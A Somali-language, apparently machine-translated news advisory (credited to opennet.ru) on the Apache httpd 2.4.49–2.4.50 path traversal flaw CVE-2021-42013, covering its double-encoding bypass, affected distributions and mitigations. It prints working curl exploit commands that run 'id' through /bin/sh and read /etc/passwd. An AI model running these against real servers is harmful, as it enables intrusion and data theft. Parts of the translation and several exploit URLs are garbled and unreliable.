Weerar cusub ayaa loo helay server-ka Apache http, kaas oo aan lagu saxin cusboonaysiinta 2.4.50 oo u oggolaanaysa gelitaanka faylasha meelaha ka baxsan tusaha xididka goobta. Intaa waxaa dheer, cilmi-baarayaashu waxay heleen hab u oggolaanaya, iyada oo ay jiraan goobo gaar ah oo aan caadi ahayn, ma aha oo kaliya inay akhriyaan faylasha nidaamka, laakiin sidoo kale inay meel fog ka fuliyaan koodka server-ka. Dhibaatadu waxay ka muuqataa kaliya siidaynta 2.4.49 iyo 2.4.50; noocyadii hore ma saameeyaan. Si loo baabi'iyo nuglaanta cusub, Apache httpd 2.4.51 si degdeg ah ayaa loo sii daayay.
Asal ahaan, dhibaatada cusub (CVE-2021-42013) waxay si buuxda ula mid tahay nuglaanta asalka ah (CVE-2021-41773) ee 2.4.49, farqiga kaliya ayaa ah mid ka duwan codaynta "..." jilayaasha. Gaar ahaan, in la sii daayo 2.4.50 awoodda isticmaalka isku xigxiga "% 2e" si ay u encode dhibic waa la xannibay, laakiin suurtogalnimada in codeing double waa la waayay - marka la tilmaamayo taxanaha "%% 32% 65", server ayaa go'aamiyay. galay "%2e" ka dibna galay ".", i.e. jilayaasha "../" si loo aado hagihii hore waxa lagu dhejin karaa ".%%32%65/"
Marka laga eego ka faa'iidaysiga nuglaanta iyada oo loo marayo fulinta code, tani waxay suurtogal tahay marka mod_cgi karti loo yeesho oo dariiqa saldhigga loo isticmaalo kaas oo fulinta qoraallada CGI la oggol yahay (tusaale ahaan, haddii dardaaranka ScriptAlias la kartiyeeyo ama calanka ExecCGI lagu cayimay Dardaaranka ikhtiyaariga ah). Shuruudaha qasabka ah ee weerarka guuleysta sidoo kale waa in si cad loo bixiyo marin u helka hagayaasha leh faylal la fulin karo, sida / bin, ama marin u helka nidaamka faylalka "/" ee goobaha Apache. Maaddaama gelitaanka noocan oo kale ah aan sida caadiga ah la siin, weerarrada fulinta kood waxay leeyihiin codsi yar oo loogu talagalay nidaamyada dhabta ah.
Isla mar ahaantaana, weerarka si loo helo waxyaabaha ku jira faylalka nidaamka gardarrada iyo qoraallada isha ee qoraallada webka, oo uu akhriyi karo adeegsadaha uu ka hoos shaqeynayo server-ka http, ayaa weli ah mid khuseeya. Si loo fuliyo weerarkan oo kale, waa ku filan tahay in hagaha goobta lagu habeeyay iyadoo la adeegsanayo dardaaranka "Alias" ama "ScriptAlias" (DocumentRoot kuma filna), sida "cgi-bin".
Tusaale ka faa'iidaysiga kuu ogolaanaya inaad ku fuliso utility "id" serverka: curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%% 32%65/.%% 32%65/.%%32%65/bin/sh' —xogta 'echo Content-Nooc: text/pain; dhawaaq; id' uid=1(daemon) gid=1(daemon) kooxaha=1(daemon)
Tusaale ka faa'iidaysiga kuu ogolaanaya inaad soo bandhigto waxa ku jira / iwm/passwd iyo mid ka mid ah qoraallada webka (si loo soo saaro koodka qoraalka, hagaha lagu qeexay dardaaranka "Alias", kaas oo fulinta qoraalka aan la oggolayn, waa in la cayimaa. sida tusaha saldhiga): curl 'http://192.168.0.1 .32/cgi-bin/.%%65%32/.%%65%32/.%%%65%32/.%%65%32/.%%65%192.168.0.1/.% %32%65/etc/passwd' curl 'http: //32/aliaseddir/.%%65%32/.%%65%32/.%%65%32/.%%65%2/. %%XNUMX%XNUMX/usr/local/apacheXNUMX/cgi -bin/test.cgi'
Dhibaatadu waxay inta badan saamaysaa qaybinta joogtada ah ee la cusboonaysiiyay sida Fedora, Arch Linux iyo Gentoo, iyo sidoo kale dekedaha FreeBSD. Xirmooyinka laamaha xasilloon ee qaybinta konserfatifka ee Debian, RHEL, Ubuntu iyo SUSE ma saameeyaan dayacanka. Dhibaatadu ma dhacdo haddii gelitaanka hagayaasha si cad loo diido iyada oo la adeegsanayo goobta "waxay u baahan tahay dhammaan diidmada".
Source: opennet.ru